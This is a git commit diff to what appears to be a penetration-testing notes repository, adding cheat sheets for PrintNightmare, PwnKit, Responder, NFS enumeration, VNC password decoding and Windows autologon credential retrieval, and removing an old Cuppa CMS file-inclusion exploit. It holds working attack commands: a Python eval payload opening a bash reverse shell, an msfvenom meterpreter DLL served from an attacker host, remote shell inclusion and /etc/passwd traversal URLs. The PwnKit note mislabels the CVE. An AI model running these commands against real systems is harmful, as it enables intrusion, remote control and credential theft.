bump

.gitmodules

@@ -106,3 +106,6 @@
 [submodule "telecommunications/sipvicious"]
 	path = telecommunications/sipvicious
 	url = https://github.com/EnableSecurity/sipvicious.git
+[submodule "exploit/windows/PrintNightmare"]
+	path = exploit/windows/PrintNightmare
+	url = https://github.com/ly4k/PrintNightmare.git

enumeration/docs/nfs.md

@@ -0,0 +1,4 @@
+# NFS Enumeration
+
+* `rpcinfo -p $TARGET_IP`
+* `showmount -e $TARGET_IP`

exploit/linux/pkexec/CVE_2021_4034.md

@@ -0,0 +1,11 @@
+# CVE-2021-4032
+
+* [Qualys put it in the open](https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt)
+* [arthepsy's exploit](https://github.com/arthepsy/CVE-2021-4034)
+
+* Arg counting starts at 1 inside pkexec logic
+* `execve( "/usr/binpkexec", (char **){NULL}, env)` puts NULL into argc[1]
+* The value behind NULL can be overwritten, which is the first env param
+
+
+

exploit/python/code_injection.md

@@ -0,0 +1,10 @@
+# Code Injection
+
+* Python's `input()`, `exec()` and `eval()` makes it possible
+
+## Usage
+
+* Payload example
+```python
+eval("__import__('os').system('bash -i >& /dev/tcp/$TARGET_IP/$TARGET_PORT 0>&1')#")
+```

exploit/web/remote_file_inclusion.txt

@@ -1,87 +0,0 @@
-# Exploit Title   : Cuppa CMS File Inclusion
-# Date            : 4 June 2013
-# Exploit Author  : CWH Underground
-# Site            : www.2600.in.th
-# Vendor Homepage : http://www.cuppacms.com/
-# Software Link   : http://jaist.dl.sourceforge.net/project/cuppacms/cuppa_cms.zip
-# Version         : Beta
-# Tested on       : Window and Linux
-
-  ,--^----------,--------,-----,-------^--,
-  | |||||||||   `--------'     |          O .. CWH Underground Hacking Team ..
-  `+---------------------------^----------|
-    `\_,-------, _________________________|
-      / XXXXXX /`|     /
-     / XXXXXX /  `\   /
-    / XXXXXX /\______(
-   / XXXXXX /          
-  / XXXXXX /
- (________(            
-  `------'
-
-####################################
-VULNERABILITY: PHP CODE INJECTION
-####################################
-
-/alerts/alertConfigField.php (LINE: 22)
-
------------------------------------------------------------------------------
-LINE 22: 
-        <?php include($_REQUEST["urlConfig"]); ?>
------------------------------------------------------------------------------
-    
-
-#####################################################
-DESCRIPTION
-#####################################################
-
-An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise.
-
-http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]
-
-#####################################################
-EXPLOIT
-#####################################################
-
-http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
-http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
-
-Moreover, We could access Configuration.php source code via PHPStream 
-
-For Example:
------------------------------------------------------------------------------
-http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php
------------------------------------------------------------------------------
-
-Base64 Encode Output:
------------------------------------------------------------------------------
-PD9waHAgCgljbGFzcyBDb25maWd1cmF0aW9uewoJCXB1YmxpYyAkaG9zdCA9ICJsb2NhbGhvc3QiOwoJCXB1YmxpYyAkZGIgPSAiY3VwcGEiOwoJCXB1YmxpYyAkdXNlciA9ICJyb290IjsKCQlwdWJsaWMgJHBhc3N3b3JkID0gIkRiQGRtaW4iOwoJCXB1YmxpYyAkdGFibGVfcHJlZml4ID0gImN1XyI7CgkJcHVibGljICRhZG1pbmlzdHJhdG9yX3RlbXBsYXRlID0gImRlZmF1bHQiOwoJCXB1YmxpYyAkbGlzdF9saW1pdCA9IDI1OwoJCXB1YmxpYyAkdG9rZW4gPSAiT0JxSVBxbEZXZjNYIjsKCQlwdWJsaWMgJGFsbG93ZWRfZXh0ZW5zaW9ucyA9ICIqLmJtcDsgKi5jc3Y7ICouZG9jOyAqLmdpZjsgKi5pY287ICouanBnOyAqLmpwZWc7ICoub2RnOyAqLm9kcDsgKi5vZHM7ICoub2R0OyAqLnBkZjsgKi5wbmc7ICoucHB0OyAqLnN3ZjsgKi50eHQ7ICoueGNmOyAqLnhsczsgKi5kb2N4OyAqLnhsc3giOwoJCXB1YmxpYyAkdXBsb2FkX2RlZmF1bHRfcGF0aCA9ICJtZWRpYS91cGxvYWRzRmlsZXMiOwoJCXB1YmxpYyAkbWF4aW11bV9maWxlX3NpemUgPSAiNTI0Mjg4MCI7CgkJcHVibGljICRzZWN1cmVfbG9naW4gPSAwOwoJCXB1YmxpYyAkc2VjdXJlX2xvZ2luX3ZhbHVlID0gIiI7CgkJcHVibGljICRzZWN1cmVfbG9naW5fcmVkaXJlY3QgPSAiIjsKCX0gCj8+
------------------------------------------------------------------------------
-
-Base64 Decode Output:
------------------------------------------------------------------------------
-<?php 
-	class Configuration{
-		public $host = "localhost";
-		public $db = "cuppa";
-		public $user = "root";
-		public $password = "Db@dmin";
-		public $table_prefix = "cu_";
-		public $administrator_template = "default";
-		public $list_limit = 25;
-		public $token = "OBqIPqlFWf3X";
-		public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
-		public $upload_default_path = "media/uploadsFiles";
-		public $maximum_file_size = "5242880";
-		public $secure_login = 0;
-		public $secure_login_value = "";
-		public $secure_login_redirect = "";
-	} 
-?>
------------------------------------------------------------------------------
-
-Able to read sensitive information via File Inclusion (PHP Stream)
-
-################################################################################################################
- Greetz      : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2 
-################################################################################################################

exploit/windows/PrintNightmare

@@ -0,0 +1 @@
+Subproject commit 5ca891c64d7dcd785730c8e6dec87476b786012c

exploit/windows/docs/printnightmare.md

@@ -0,0 +1,27 @@
+# Print Nightmare
+
+* Clone [cube0x0's exploits](https://github.com/cube0x0/CVE-2021-1675.git)
+
+* Create virtual env inside cloned repo and install impacket
+```sh
+pip install .
+pip2 install .
+```
+
+* Create payload
+```sh
+msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=4711 -f dll -o giftcard.dll
+```
+
+* Prepare msf multi handler
+
+* Inside virtualenv
+```sh
+smbserver share $(pwd) -smb2support
+```
+
+* Roll the exploit
+```sh
+python CVE-2021-1675.py GROUP/username:'password'@$TARGET_IP '\\$ATTACKER_IP\share\giftcard.dll'
+```
+

exploit/windows/docs/responder.md

@@ -0,0 +1,10 @@
+# Responder
+
+* [lgandx's repo](https://github.com/lgandx/Responder.git)
+
+Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication
+
+## Usage
+```sh
+responder -I tun0 -wrvd
+```

exploit/windows/impacket

@@ -1 +1 @@
-Subproject commit 10e53952e64e290712d49e263420b70b681bbc73
+Subproject commit e007046def3d7e2afa27dd83cb9e53f452099175

hashes/password_cracking/vnc.md

@@ -0,0 +1,6 @@
+# VNC Password Decoding
+
+* Found passwords in vnc config files may be decoded via
+```sh
+ echo -n "<key>" | xxd -r -p |  openssl enc -des-cbc --nopad --nosalt -K 5AB2CDC0BADCAF13F1 -iv 0000000000000000 -d | hexdump -Cv
+```

post_exploitation/docs/windows/registry.md

@@ -0,0 +1,7 @@
+# Windows Registry
+
+## AutoLogin Password
+* Automatic logon password is save in plaintext 
+```
+reg query "HKLM\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon"
+```

post_exploitation/priv_esc/docs/windows/windows_priv_esc.md

@@ -54,6 +54,7 @@ wmic service list brief | findstr  "Running"
 * `SeImpersonatePrivilege` is necessary, check via `whoami priv`
 *  Hot Potato is best before Server 2019 and Windows 10 (version 1809)
 * [Potatos](../../../../exploit/windows/docs/potatoes.md)
+* [itm4n](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/)
 
 ### Schedules Tasks
 * `schtasks`